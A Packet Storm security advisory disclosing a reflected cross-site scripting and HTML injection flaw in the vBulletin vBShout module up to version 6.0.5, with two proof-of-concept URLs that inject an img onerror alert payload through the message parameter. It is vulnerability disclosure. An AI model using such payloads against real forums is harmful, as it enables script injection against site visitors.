vBulletin vBShout module versions 6.0.5 and below suffer from a cross site scripting vulnerability.
462691bf6e33cb4da99f73fd68d72c50e99cf6cb8e3203bd504dcf8a334e3836###############################################################################################################
# Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) -
Reflected Cross-Site Scripting ( XSS )
# Note: HTML Injection and Redirect works too
# Script Page : http://www.dragonbyte-tech.com
# Date: 24-03-2012
# Author : Avram Marius Gabriel (d3v1l)
# RandomStorm - http://www.randomstorm.com
# Tested on: Windows XP & Vista
###############################################################################################################
# The last version of vBulletin vBShout Module suffers from Cross-Site
Scripting and HTML Injection
The issue is located in Shoutbox Search Archive
# POC:
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1
onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]
=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1
################################################################################################################
# vBShout is the ideal way to keep members on your forum while they wait
for replies to their posts.
It can be used in many ways - as a chat room for members, for staff to
discuss issues in realtime,
as a live-update feed of new posts and threads, as a way to track member
milestones
################################################################################################################
--
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on
Twitter<http://twitter.com/securityshell>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed